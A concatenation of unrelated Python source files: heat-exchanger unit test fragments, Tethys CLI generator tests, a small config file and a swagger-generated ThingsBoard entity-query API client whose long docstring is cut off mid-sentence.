mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_before_hex', new_callable=mock.PropertyMock) as mock_property_3, \
mock.patch('heat_exchanger_network.thermodynamic_parameter.ThermodynamicParameter.temperatures_cold_stream_after_hex', new_callable=mock.PropertyMock) as mock_property_4, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.mixer_types', new_callable=mock.PropertyMock) as mock_property_5, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.inlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_6, \
mock.patch('heat_exchanger_network.heat_exchanger.heat_exchanger.OperationParameter.outlet_temperatures_cold_stream', new_callable=mock.PropertyMock) as mock_property_7:
mock_property_1.return_value = np.array([[400 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_2.return_value = np.array([[300 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_3.return_value = np.array([[290 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_4.return_value = np.array([[350 * (i + 1) for i in test_case.range_operating_cases] for e in test_case.range_heat_exchangers])
mock_property_5.return_value = ['none', 'admixer_cold']
mock_property_6.return_value = [500, 110]
mock_property_7.return_value = [500, 10]
test_parameter.heat_loads[:, :] = 2000
assert test_exchanger.infeasibility_mixer[0]
assert test_exchanger.infeasibility_mixer[1] == (0 - np.sum(1))**2
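Each scenario above rebuilds the same nested stack of `mock.patch(..., new_callable=mock.PropertyMock)` context managers by hand. A hedged, self-contained sketch of how such a stack can be collapsed with `contextlib.ExitStack` — the `Sensor` class and `patch_properties` helper below are illustrative stand-ins, not part of this test suite:

```python
from contextlib import ExitStack
from unittest import mock


class Sensor:
    """Illustrative stand-in for a class with read-only properties."""

    @property
    def reading(self):
        return 0

    @property
    def status(self):
        return 'off'


def patch_properties(cls, names):
    """Patch each named property on cls with a PropertyMock.

    Returns (stack, {name: property_mock}); the caller closes the stack
    (e.g. via ``with stack:``) to restore the real properties.
    """
    stack = ExitStack()
    mocks = {name: stack.enter_context(
        mock.patch.object(cls, name, new_callable=mock.PropertyMock))
        for name in names}
    return stack, mocks


stack, mocks = patch_properties(Sensor, ['reading', 'status'])
with stack:
    mocks['reading'].return_value = 42
    mocks['status'].return_value = 'on'
    assert Sensor().reading == 42 and Sensor().status == 'on'
assert Sensor().reading == 0  # patches unwound, real property restored
```

One `patch_properties` call then replaces the seven-line `with mock.patch(...) as ...` chains, with the PropertyMocks addressable by name instead of `mock_property_1` through `mock_property_7`.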
cfc85ca15f472fbc62b8b98a558643044cb15f51 | 48 | py | Python | topsis/__init__.py | Arushi872/101703106topsis | 4be6ed634399a841c329b84bb3aece9844303ecc | ["MIT"]
from topsis_by_van.topsis_by_van import topsis
cfccff5b2caf4c1cda62103139b55756ecdbd6b0 | 18,057 | py | Python | tests/unit_tests/test_tethys_cli/test_gen_commands.py | msouff/tethys | 45795d1e6561d5db8fddd838f4d1ae1d91dbb837 | ["BSD-2-Clause"]
import unittest
from unittest import mock
from tethys_cli.gen_commands import (
get_environment_value,
get_settings_value,
generate_command,
GEN_SETTINGS_OPTION,
GEN_NGINX_OPTION,
GEN_NGINX_SERVICE_OPTION,
GEN_ASGI_SERVICE_OPTION,
GEN_SERVICES_OPTION,
GEN_INSTALL_OPTION,
GEN_PORTAL_OPTION,
GEN_SITE_YAML_OPTION
)
class CLIGenCommandsTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_get_environment_value(self):
result = get_environment_value(value_name='DJANGO_SETTINGS_MODULE')
self.assertEqual('tethys_portal.settings', result)
def test_get_environment_value_bad(self):
self.assertRaises(EnvironmentError, get_environment_value,
value_name='foo_bar_baz_bad_environment_value_foo_bar_baz')
def test_get_settings_value(self):
result = get_settings_value(value_name='INSTALLED_APPS')
self.assertIn('tethys_apps', result)
def test_get_settings_value_bad(self):
self.assertRaises(ValueError, get_settings_value, value_name='foo_bar_baz_bad_setting_foo_bar_baz')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
def test_generate_command_settings_option_default(self, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_SETTINGS_OPTION
mock_args.directory = None
generate_command(args=mock_args)
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_settings_option(self, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock(session_warning='no_a_number', session_expire='no_a_number',
static_root=None, workspaces_root=None,
django_analytical=['CLICKMAP_TRACKER_ID:123456'],
add_backends=['hydroshare', 'project.backend.CustomBackend hydroshare'],
oauth_options=['SOCIAL_AUTH_GOOGLE_OAUTH2_KEY:123456'])
mock_args.type = GEN_SETTINGS_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
def test_gen_settings_value_error(self):
mock_args = mock.MagicMock(type=GEN_SETTINGS_OPTION, directory=None, django_analytical=['CLICKMAP_TRACKER_ID'])
with self.assertRaises(ValueError):
generate_command(args=mock_args)
mock_args = mock.MagicMock(type=GEN_SETTINGS_OPTION, directory=None,
oauth_options=['SOCIAL_AUTH_GOOGLE_OAUTH2_KEY'])
with self.assertRaises(ValueError):
generate_command(args=mock_args)
@mock.patch('tethys_cli.gen_commands.get_settings_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_nginx_option(self, mock_os_path_isfile, mock_file, mock_settings):
mock_args = mock.MagicMock()
mock_args.type = GEN_NGINX_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_settings.side_effect = ['/foo/workspace', '/foo/static']
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_settings.assert_any_call('TETHYS_WORKSPACES_ROOT')
mock_settings.assert_called_with('STATIC_ROOT')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_nginx_service(self, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_NGINX_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_portal_yaml(self, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_PORTAL_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.render_template')
@mock.patch('tethys_cli.gen_commands.linux_distribution')
@mock.patch('tethys_cli.gen_commands.os.path.exists')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option_nginx_conf_redhat(self, mock_os_path_isfile, mock_file, mock_env,
mock_os_path_exists, mock_linux_distribution,
mock_render_template):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_exists.return_value = True
mock_linux_distribution.return_value = ['redhat']
mock_file.return_value = mock.mock_open(read_data='user foo_user').return_value
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
mock_os_path_exists.assert_called_once_with('/etc/nginx/nginx.conf')
context = mock_render_template.call_args_list[0][0][1]
self.assertEqual('http-', context['user_option_prefix'])
self.assertEqual('foo_user', context['nginx_user'])
@mock.patch('tethys_cli.gen_commands.render_template')
@mock.patch('tethys_cli.gen_commands.linux_distribution')
@mock.patch('tethys_cli.gen_commands.os.path.exists')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option_nginx_conf_ubuntu(self, mock_os_path_isfile, mock_file, mock_env,
mock_os_path_exists, mock_linux_distribution,
mock_render_template):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_exists.return_value = True
mock_linux_distribution.return_value = 'ubuntu'
mock_file.return_value = mock.mock_open(read_data='user foo_user').return_value
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
mock_os_path_exists.assert_called_once_with('/etc/nginx/nginx.conf')
context = mock_render_template.call_args_list[0][0][1]
self.assertEqual('', context['user_option_prefix'])
self.assertEqual('foo_user', context['nginx_user'])
@mock.patch('tethys_cli.gen_commands.render_template')
@mock.patch('tethys_cli.gen_commands.linux_distribution')
@mock.patch('tethys_cli.gen_commands.os.path.exists')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option_nginx_conf_not_linux(self, mock_os_path_isfile, mock_file, mock_env,
mock_os_path_exists, mock_linux_distribution,
mock_render_template):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_exists.return_value = True
mock_linux_distribution.side_effect = Exception
mock_file.return_value = mock.mock_open(read_data='user foo_user').return_value
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
mock_os_path_exists.assert_called_once_with('/etc/nginx/nginx.conf')
context = mock_render_template.call_args_list[0][0][1]
self.assertEqual('', context['user_option_prefix'])
self.assertEqual('foo_user', context['nginx_user'])
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option(self, mock_os_path_isfile, mock_file, mock_env):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
generate_command(args=mock_args)
mock_os_path_isfile.assert_called()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.linux_distribution')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_service_option_distro(self, mock_os_path_isfile, mock_file, mock_env,
mock_distribution):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_distribution.return_value = ('redhat', 'linux', '')
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.os.path.isdir')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_settings_option_directory(self, mock_os_path_isfile, mock_file, mock_env,
mock_os_path_isdir):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = '/foo/temp'
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_isdir.return_value = True
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_os_path_isdir.assert_called_with(mock_args.directory)
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.print')
@mock.patch('tethys_cli.gen_commands.exit')
@mock.patch('tethys_cli.gen_commands.os.path.isdir')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_settings_option_bad_directory(self, mock_os_path_isfile, mock_env,
mock_os_path_isdir, mock_exit, mock_print):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = '/foo/temp'
mock_os_path_isfile.return_value = False
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_os_path_isdir.return_value = False
# NOTE: to prevent our tests from exiting prematurely, we change the behavior of exit to raise an exception
# to break the code execution, which we catch below.
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, generate_command, args=mock_args)
mock_os_path_isfile.assert_not_called()
mock_os_path_isdir.assert_called_once_with(mock_args.directory)
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
self.assertIn('ERROR: ', rts_call_args[0][0][0])
self.assertIn('is not a valid directory', rts_call_args[0][0][0])
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.print')
@mock.patch('tethys_cli.gen_commands.exit')
@mock.patch('tethys_cli.gen_commands.input')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_settings_pre_existing_input_exit(self, mock_os_path_isfile, mock_env,
mock_input, mock_exit, mock_print):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_args.overwrite = False
mock_os_path_isfile.return_value = True
mock_env.side_effect = ['/foo/conda', 'conda_env']
mock_input.side_effect = ['foo', 'no']
# NOTE: to prevent our tests from exiting prematurely, we change the behavior of exit to raise an exception
# to break the code execution, which we catch below.
mock_exit.side_effect = SystemExit
self.assertRaises(SystemExit, generate_command, args=mock_args)
mock_os_path_isfile.assert_called_once()
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
self.assertIn('Generation of', rts_call_args[0][0][0])
self.assertIn('cancelled', rts_call_args[0][0][0])
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.get_environment_value')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_asgi_settings_pre_existing_overwrite(self, mock_os_path_isfile, mock_file, mock_env):
mock_args = mock.MagicMock()
mock_args.type = GEN_ASGI_SERVICE_OPTION
mock_args.directory = None
mock_args.overwrite = True
mock_os_path_isfile.return_value = True
mock_env.side_effect = ['/foo/conda', 'conda_env']
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
mock_env.assert_any_call('CONDA_HOME')
mock_env.assert_called_with('CONDA_ENV_NAME')
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
def test_generate_command_services_option(self, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_SERVICES_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
@mock.patch('tethys_cli.gen_commands.print')
def test_generate_command_install_option(self, mock_print, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_INSTALL_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
rts_call_args = mock_print.call_args_list
self.assertIn('Please review the generated install.yml', rts_call_args[0][0][0])
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
@mock.patch('tethys_cli.gen_commands.open', new_callable=mock.mock_open)
@mock.patch('tethys_cli.gen_commands.os.path.isfile')
@mock.patch('tethys_cli.gen_commands.print')
def test_generate_command_site_content_yaml_option(self, mock_print, mock_os_path_isfile, mock_file):
mock_args = mock.MagicMock()
mock_args.type = GEN_SITE_YAML_OPTION
mock_args.directory = None
mock_os_path_isfile.return_value = False
generate_command(args=mock_args)
rts_call_args = mock_print.call_args_list
self.assertIn('Please review the generated site_content.yml', rts_call_args[0][0][0])
mock_os_path_isfile.assert_called_once()
mock_file.assert_called()
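The 'bad directory' and 'cancelled' tests above share a pattern worth isolating: `exit` is replaced by a mock whose `side_effect` raises `SystemExit`, so execution stops at the exit call without actually terminating the test runner. A minimal, self-contained sketch of the same pattern — `fail_fast` and `ExitPatternTest` below are illustrative, not taken from `tethys_cli`:

```python
import sys
import unittest
from unittest import mock


def fail_fast(directory_ok):
    """Toy stand-in for a CLI command that prints an error and exits."""
    if not directory_ok:
        print('ERROR: is not a valid directory')
        sys.exit(1)
    return 'ok'


class ExitPatternTest(unittest.TestCase):
    @mock.patch('builtins.print')
    @mock.patch('sys.exit')
    def test_bad_directory(self, mock_exit, mock_print):
        # Raising SystemExit from the mock halts execution at the exit()
        # call, just as the real interpreter would, without killing the
        # test process; assertRaises then confirms the exit path was taken.
        mock_exit.side_effect = SystemExit
        self.assertRaises(SystemExit, fail_fast, False)
        self.assertIn('ERROR', mock_print.call_args_list[0][0][0])


result = unittest.TextTestRunner(verbosity=0).run(
    unittest.defaultTestLoader.loadTestsFromTestCase(ExitPatternTest))
assert result.wasSuccessful()
```

Note the decorator order: decorators apply bottom-up, so the innermost patch (`sys.exit`) is the first mock argument after `self`. Without the `SystemExit` side effect, code after the mocked `exit` would keep running and later assertions could pass for the wrong reason.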
cfeeb465bb83ecfb0659a69a7e173f69727b393e | 83 | py | Python | writers_block/config.py | oaao/writers-block | 3518bdea5252abb75a3b941b0b8dee3cacfb86ca | ["MIT"]
CLIENT_ADDRESS = '7dfef7aed2105b7eceb4d34e1ad84fdad4693bd5de041e1b47079efeb6001a83'
3215af869aa1e512a7f55a8d2d13822fb9ecf6c5 | 88,783 | py | Python | tb_rest_client/api/api_ce/entity_query_controller_api.py | samson0v/python_tb_rest_client | 08ff7898740f7cec2170e85d5c3c89e222e967f7 | ["Apache-2.0"]
# coding: utf-8
"""
ThingsBoard REST API
ThingsBoard open-source IoT platform REST API documentation. # noqa: E501
OpenAPI spec version: 3.3.3-SNAPSHOT
Contact: info@thingsboard.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class EntityQueryControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def count_entities_by_query_using_post(self, **kwargs): # noqa: E501
"""Count Entities by Query # noqa: E501
Allows to run complex queries to search the count of platform entities (devices, assets, customers, etc) based on the combination of main entity filter and multiple key filters. Returns the number of entities that match the query definition. # Query Definition Main **entity filter** is mandatory and defines generic search criteria. For example, \"find all devices with profile 'Moisture Sensor'\" or \"Find all devices related to asset 'Building A'\" Optional **key filters** allow to filter results of the entity filter by complex criteria against main entity fields (name, label, type, etc), attributes and telemetry. For example, \"temperature > 20 or temperature< 10\" or \"name starts with 'T', and attribute 'model' is 'T1000', and timeseries field 'batteryLevel' > 40\". Let's review the example: ```json { \"entityFilter\": { \"type\": \"entityType\", \"entityType\": \"DEVICE\" }, \"keyFilters\": [ { \"key\": { \"type\": \"ATTRIBUTE\", \"key\": \"active\" }, \"valueType\": \"BOOLEAN\", \"predicate\": { \"operation\": \"EQUAL\", \"value\": { \"defaultValue\": true, \"dynamicValue\": null }, \"type\": \"BOOLEAN\" } } ] } ``` Example mentioned above search all devices which have attribute 'active' set to 'true'. Now let's review available entity filters and key filters syntax: # Entity Filters Entity Filter body depends on the 'type' parameter. Let's review available entity filter types. In fact, they do correspond to available dashboard aliases. ## Single Entity Allows to filter only one entity based on the id. For example, this entity filter selects certain device: ```json { \"type\": \"singleEntity\", \"singleEntity\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"DEVICE\" } } ``` ## Entity List Filter Allows to filter entities of the same type using their ids. 
For example, this entity filter selects two devices: ```json { \"type\": \"entityList\", \"entityType\": \"DEVICE\", \"entityList\": [ \"e6501f30-2a7a-11ec-94eb-213c95f54092\", \"e6657bf0-2a7a-11ec-94eb-213c95f54092\" ] } ``` ## Entity Name Filter Allows filtering entities of the same type using the **'starts with'** expression over the entity name. For example, this entity filter selects all devices whose name starts with 'Air Quality': ```json { \"type\": \"entityName\", \"entityType\": \"DEVICE\", \"entityNameFilter\": \"Air Quality\" } ``` ## Entity Type Filter Allows filtering entities based on their type (CUSTOMER, USER, DASHBOARD, ASSET, DEVICE, etc). For example, this entity filter selects all tenant customers: ```json { \"type\": \"entityType\", \"entityType\": \"CUSTOMER\" } ``` ## Asset Type Filter Allows filtering assets based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'charging station' assets whose name starts with 'Tesla': ```json { \"type\": \"assetType\", \"assetType\": \"charging station\", \"assetNameFilter\": \"Tesla\" } ``` ## Device Type Filter Allows filtering devices based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Temperature Sensor' devices whose name starts with 'ABC': ```json { \"type\": \"deviceType\", \"deviceType\": \"Temperature Sensor\", \"deviceNameFilter\": \"ABC\" } ``` ## Edge Type Filter Allows filtering edge instances based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Factory' edge instances whose name starts with 'Nevada': ```json { \"type\": \"edgeType\", \"edgeType\": \"Factory\", \"edgeNameFilter\": \"Nevada\" } ``` ## Entity View Filter Allows filtering entity views based on their type and the **'starts with'** expression over their name. 
For example, this entity filter selects all 'Concrete Mixer' entity views whose name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ``` ## Api Usage Filter Allows querying for Api Usage based on an optional customer id. If the customer id is not set, returns the current tenant API usage. For example, this entity filter selects the 'Api Usage' entity for the customer with id 'e6501f30-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"apiUsageState\", \"customerId\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"CUSTOMER\" } } ``` ## Relations Query Filter Allows filtering entities that are related to the provided root entity. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'filters' object allows you to define the relation type and the set of acceptable entity types to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only those that match the 'filters'. For example, this entity filter selects all devices and assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"relationsQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"filters\": [ { \"relationType\": \"Contains\", \"entityTypes\": [ \"DEVICE\", \"ASSET\" ] } ] } ``` ## Asset Search Query Allows filtering assets that are related to the provided root entity. Filters related assets based on the relation type and a set of asset types. Possible direction values are 'TO' and 'FROM'. 
The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'assetTypes' defines the types of the assets to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only assets that match the 'relationType' and 'assetTypes' conditions. For example, this entity filter selects 'charging station' assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"assetSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"assetTypes\": [ \"charging station\" ] } ``` ## Device Search Query Allows filtering devices that are related to the provided root entity. Filters related devices based on the relation type and a set of device types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the types of the devices to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match the 'relationType' and 'deviceTypes' conditions. 
For example, this entity filter selects 'Charging port' and 'Air Quality Sensor' devices which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"deviceTypes\": [ \"Air Quality Sensor\", \"Charging port\" ] } ``` ## Entity View Query Allows filtering entity views that are related to the provided root entity. Filters related entity views based on the relation type and a set of entity view types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'entityViewTypes' defines the types of the entity views to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only entity views that match the 'relationType' and 'entityViewTypes' conditions. For example, this entity filter selects 'Concrete mixer' entity views which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"entityViewSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"entityViewTypes\": [ \"Concrete mixer\" ] } ``` ## Edge Search Query Allows filtering edge instances that are related to the provided root entity. Filters related edge instances based on the relation type and a set of edge types. 
Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'edgeTypes' defines the types of the edge instances to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only edge instances that match the 'relationType' and 'edgeTypes' conditions. For example, this entity filter selects 'Factory' edge instances which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"edgeSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"edgeTypes\": [ \"Factory\" ] } ``` # Key Filters A Key Filter allows you to define complex logical expressions over an entity field, attribute or latest time-series value. The filter is defined using 'key', 'valueType' and 'predicate' objects. A single entity query may have zero, one or multiple key filters. If multiple filters are defined, they are evaluated using a logical 'AND'. The example below checks that the temperature of the entity is above 20 degrees: ```json { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ``` Now let's review the 'key', 'valueType' and 'predicate' objects in detail. ## Filter Key A Filter Key defines either an entity field, an attribute or a telemetry key. It is a JSON object that consists of the key name and type. 
The following filter key types are supported: * 'CLIENT_ATTRIBUTE' - used for client attributes; * 'SHARED_ATTRIBUTE' - used for shared attributes; * 'SERVER_ATTRIBUTE' - used for server attributes; * 'ATTRIBUTE' - used for any of the above; * 'TIME_SERIES' - used for time-series values; * 'ENTITY_FIELD' - used for accessing entity fields like 'name', 'label', etc. The list of available fields depends on the entity type; * 'ALARM_FIELD' - similar to entity field, but is used in alarm queries only. Let's review the example: ```json { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ``` ## Value Type and Operations Provides a hint about the data type of the entity field that is defined in the filter key. The value type impacts the list of possible operations that you may use in the corresponding predicate. For example, you may use 'STARTS_WITH' or 'ENDS_WITH', but you can't use 'GREATER_OR_EQUAL' for string values. The following filter value types and corresponding predicate operations are supported: * 'STRING' - used to filter any 'String' or 'JSON' values. Operations: EQUAL, NOT_EQUAL, STARTS_WITH, ENDS_WITH, CONTAINS, NOT_CONTAINS; * 'NUMERIC' - used for 'Long' and 